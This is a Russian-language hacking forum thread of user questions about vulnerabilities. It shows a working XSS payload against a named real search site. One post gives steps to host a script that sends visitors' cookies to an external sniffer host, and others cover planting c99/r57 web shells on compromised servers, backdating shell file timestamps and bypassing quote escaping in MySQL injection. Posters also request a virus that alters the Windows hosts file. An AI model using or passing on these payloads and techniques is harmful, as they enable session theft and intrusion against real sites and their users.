Ваши вопросы по уязвимостям.

есть у когонибудь файлы вируса который правит этот файл -"C:\WINDOWS\system32\drivers\etc\hosts" если не трудно скинте ссылку где скачать можно...или как самому написать такой... вобщем интересует всё по этой теме...буду рад любой помощи...

 

PHP:

http://m.myrambler.ru/search.php?pagelen=10&query=%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E

Вот это работает.

А когда ставлю ссылку из сниффера, тогда не работает.

mailbrush прав, если значение поисков нету тогда и xss нету, дело в том что в значениях поиска нет ссылки из сниффера, а раза "><script>alert('xss')</script> есть, поэтому xss как "><script>alert('xss')</script> действует, а ссылка из сниффера не действует,

 

Если я напишу Google, выдача поиска будет, но XSS нет. А если же

Code:

google "><script>img = new Image(); img.src = "http://httpz.ru/ndemo.gif?"+document.cookie;</script> 

не будет выдачи, т.к. поиск ничего не найдет. И опять советуешь не проверяя... Оператора OR нету в рамблере, и при чем здесь яша? В коде + нужен как плюс, а не пробел! Ты конкатезируешь

Code:

http://httpz.ru/ndemo.gif?

и куки.

Cehennem, зарегай себе хост, к примеру sdagsfhfh.ru, залей файлик script.js по адресу

Code:

http://sdagsfhfh.ru/script.js

с содержанием

Code:

img = new Image(); 
img.src = "http://httpz.ru/ndemo.gif?"+document.cookie;

Дальше заходи

Code:

http://m.myrambler.ru/search.php?pagelen=10&query="><script src="http://sdagsfhfh.ru/script.js"></script>

Потом на сниффер И ты увидишь стыренные куки...

 

У меня вопросик. есть сайтик...открыт 88 порт. там открыты две дерриктория одна админка...во второй фаил httacces - читаемый. можно туда шшел впарить. За ссылкой сайта пишите в личку.

 

Это обычный листинг.
Ничего не сделаешь.

 

Понятно =) спасибо успокоил )

 

Code:

*6AA4CFC00B1D328F27C6DEF46C4E3CBD30925B97

 

за какие приделы? откуда выйти? разъясняй понятней.

 

он видимо имеет ввиду хедеры) да?)

 

вопрос такой,как выставить дату заливки шелла?

 

http://ru.php.net/touch

 

del

 

такая беда,залил шелл, сервер : 2003 + wampserver,но файлы шелл (с99) заливать не хочет выбивает и все,на линусах некторых тоже такая фигня поскакивает, не буду же каждый раз я через админку все грузить,какие причины этого? спасибо!

 

причины:
1 - Не с99 единым...
2 - Есть еще "создать файл"
3 - права на запись есть?

 

Можно ли как-то использовать LIKE в инъекции, если кавычки экранируются? БД MySQL.

 

LIKE+CHAR(37,112,37)
LIKE+0x257025

 

Ээээ ?

"закодирован и как то этим фильтруется" -- что это должно означать?

Чем "этим" и кто "он" фильтруется, и как по причине "закодирования" может не работать заливка файлов?

 

На винде есть прова на чтение запись практиски куда угодно,а вод под никсом одним и r57 не аплоадит,там сборка 1 апреля этого года,вообще не знаю чего думать,перепробовал все папки где есть прова (копи-пастил его) и пофик
p.s создать файл не катит,их надо больше штуки содавать

это бывает когда ты льешь с подменой расширения